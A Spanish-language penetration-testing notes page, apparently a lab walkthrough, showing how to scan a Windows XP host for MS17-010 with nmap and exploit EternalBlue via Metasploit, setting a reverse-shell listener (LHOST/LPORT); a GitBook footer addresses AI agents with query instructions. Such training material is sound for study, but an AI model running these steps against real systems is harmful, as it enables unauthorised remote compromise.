> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/ports-and-services/smb-445/eternalblue-exploitation.md).

# Explotación de EternalBlue

## Explotación de EternalBlue - SMB /\[MS17-010]

El escaneo de Nmap muestra que el servidor objetivo ejecuta Windows XP, por lo que vale la pena validar la explotación de MS17-010.

Ejecute un escaneo de Nmap para comprobar la vulnerabilidad:

```bash
nmap --script "vuln and safe" -p445 10.10.10.4 -oN smbScan
```

Este escaneo confirma que la máquina es vulnerable a MS17-010.

<figure><img src="/files/8867d5eee4836300a8e4e0ce6582dab8c16c5b32" alt=""><figcaption></figcaption></figure>

## **Explotación con Metasploit**

Busque el exploit en Metasploit:

```
msfconsole 
search eternalblue 
```

Seleccione el primer exploit de la lista:

```
use 1
```

<figure><img src="/files/4bd1d6d6a08cc3323b6d6497419186d6df7a6630" alt=""><figcaption></figcaption></figure>

Configure las opciones:

```bash
set RHOSTS 10.10.10.4
set LHOST 10.10.14.50
set LPORT 443
```

<figure><img src="/files/d9496310645284eb8c7e29b84fa1778898f56771" alt="" width="563"><figcaption></figcaption></figure>

Luego lance el exploit:

<figure><img src="/files/08521315dd6b147b58d12bfc57224f75298b8b06" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/ports-and-services/smb-445/eternalblue-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
